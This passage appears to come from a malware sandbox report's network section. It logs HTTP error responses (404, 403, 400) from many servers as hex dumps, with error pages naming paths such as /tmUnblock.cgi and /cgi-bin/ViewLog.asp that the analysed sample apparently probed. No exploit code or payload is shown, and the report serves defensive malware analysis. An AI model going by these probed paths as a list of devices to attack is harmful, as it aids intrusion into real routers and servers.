2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 994Date: Thu, 21 Mar 2024 04:18:43 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 31 38 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 74 6d 55 6e 62 6c 6f 63 6b 2e 63 67 69 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Tue, 25 Jun 2019 07:01:36 GMTetag: "999-5d11c6d0-22a3701833ded0e1;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Thu, 21 Mar 2024 04:22:12 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu Mar 21 08:22:12 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Tue, 25 Jun 2019 07:01:36 GMTetag: "999-5d11c6d0-22a3701833ded0e1;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Thu, 21 Mar 2024 04:22:12 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Mar 2024 04:22:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Mar 2024 04:22:14 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=3, max=1000Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 31 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:14 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Server: HTTPDDate: Thu, 21 Mar 2024 04:22:26 GMTConnection: closeContent-Type: text/htmlX-Frame-Options: SAMEORIGIN
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Thu, 21 Mar 2024 04:22:26 GMTserver: Apachevary: accept-language,accept-charsetupgrade: h2connection: Upgradeaccept-ranges: bytestransfer-encoding: chunkedcontent-type: text/html; charset=utf-8content-language: enData Raw: 33 43 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 31 32 37 2e 30 2e 30 2e 31 3c
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:27 GMTServer: Apache/2.4.56 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 65 76 31 35 2e 6e 65 77 65 67 6f 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.56 (Debian) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:22:27 GMTServer: Apache/2.4.56 (Debian)Content-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IE
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 21 Mar 2024 04:22:27 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 